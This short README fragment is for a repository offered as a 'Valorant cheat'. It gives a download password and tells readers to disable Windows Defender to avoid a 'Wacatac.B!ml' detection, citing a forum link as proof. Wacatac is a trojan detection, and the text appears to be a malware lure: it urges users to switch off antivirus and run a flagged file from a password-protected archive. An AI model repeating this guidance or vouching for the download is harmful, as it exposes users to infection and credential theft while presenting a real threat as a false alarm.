CL053/Valorant-Cheat-VMods-v2.6-/README.md

 -------------------------------------------------------------HOW TO DOWNLOAD------------------------------------------------------------------------
+If you download the Cheat on Google Chrome the code is:	Bdhx69M8F48b And click download the file.

 Disable windows defender to avoid this “Wacatac.B!ml” error when downloading the cheat present in the "main" file proof here: (https://forum.malekal.com/viewtopic.php?t=68232)